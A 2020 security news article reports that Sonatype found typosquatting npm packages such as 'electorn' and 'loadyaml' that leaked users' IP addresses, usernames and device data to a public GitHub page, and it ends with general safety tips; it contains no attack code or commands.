Typosquatters Use Two Malicious NPM Packages to Steal User Data
Table of Contents
- By Dawna M. Roberts
- Published: Oct 08, 2020
- Last Updated: Mar 18, 2022
Last week Sonatype, security researchers, found two malicious codes buried in NPM packages on the NPM (Node Package Manager) downloads repository. When installed, they expose usernames, IP addresses, and device fingerprint data online.
What Happened?
The culprits used typosquatting to conceal the files in with legitimate open-source components on the popular developer resource. The two files named: “electorn” and “loadyaml,” were meant to fool users who mistyped the words into the search module, which then delivered the malicious versions of these packages and quickly started to do damage.
Open Source Exposes a Wide Victim Pool
Open source code is wildly popular, especially in developer circles. Because of this, it provides a vast playground for nefarious threat actors to test new variants of their malicious code on unsuspecting victims looking for free downloadable resources.
What is Typosquatting?
Typosquatting is a slang term for when hackers and nefarious criminals use typos to their advantage. Sometimes they create fake websites that mimic a legitimate site, but the name is just one or two letters off, so anyone who mistypes the address into the URL bar may end up in the dark woods instead of where they intended to be. For example, a developer looking for the “electron” code might type in “electorn” by mistake and download the malicious file.
Criminals use typosquatting to insert malicious code into various repositories hoping that some unsuspecting victims will assume the typo was a mistake from the original developer and install the code anyway. Unfortunately, in this case, both files were spiked with malicious code that, when installed, exposes the user’s IP address, geolocation data, usernames, and device fingerprint data online for anyone to see.
The NPM Issue
The NPM issue occurred during the months of August and September, and by September 30th, it was discovered but not before the four packages had been downloaded 400 times by users. Along with the “electorn” and “loadyaml,” files were two others “loadashs” and “loadyml,” which the author removed before they could be flagged as malicious code.
NPM downloads repository removed the remaining two packages, and GitHub has confirmed that they also removed the GitHub page associated with them.
Both malicious files included an innocuous index.js file with skeleton code, but the real payload was in the package.json file, and then an update.js file collected data about the user and device, which was then posted to a live, open GitHub page in the comments section. The data automatically deleted after 24 hours, so it’s not clear what the hacker’s endgame or goal was. Perhaps just a test.
After investigation, security researchers confirmed that the code was sophisticated enough to hide its API endpoints and URLs. If you want to read about all the nitty, gritty technical details, Sonatype has a web page with all the specifics.
When Did This Take Place?
The original files were uploaded to the platform around August 17-24 and began collecting data. The first exposed details appeared on GitHub on August 25th.
By August 18th, Sonatype’s malicious code detection bots flagged the files as potentially dangerous. By September 30, they notified both NPM and GitHub, and by October 1, 2020, both the files and accompanying page was removed.
Sonatype’s malicious code detection bots use machine learning and artificial intelligence to monitor update signals, code commits, and developer patterns to identify suspicious files and authors. Sonatype’s primary focus is on supply chain software protection.
The Larger Problem
Sadly, Sonatype also reported a 430% increase in open-source software attacks occurring year after year and mentioned that it is “virtually impossible to manually chase and keep track of such components.” What makes these attacks, so alarming is that cybercriminals are proactively injecting malicious code into open-source software meant for the global supply chain, which right now is critical to everyone’s survival.
Sonatype further explained that “By shifting their focus “upstream,” such as with open-source malware in “electorn,” bad actors can infect a single component, which will, and this case probably have been, then be distributed “downstream” using legitimate software workflows and update mechanisms.”
Developers creating software in the supply chain space were notified by Sonatype along with instructions on how to remove the risk and safely update their software without any malicious content.
What Can Be Done About It?
This latest incident should serve as a reminder that no place online is safe, and hackers can get to you anywhere. Whenever downloading any type of software, open-source or not, be sure to have antivirus/anti-malware software running on your machine to inspect and clean any infections.
Additionally, keep in mind these other tips:
- Be very careful where you download open-source files from and always be mindful of spelling. If you notice a typo, move onto the next file.
- Research file extensions, reviews, authors, and do a little research before installing anything on your machine which could expose you or your data for identity theft or fraud.
- Install and keep running antivirus/anti-malware software on all your devices and run deep scans often.
- Be on the lookout for phishing or other scams.
- Never click links in an email.
Regardless of the industry or type of software developers use, extra precautions must be employed to keep servers, supply chains, and endpoint consoles virus and malware-free.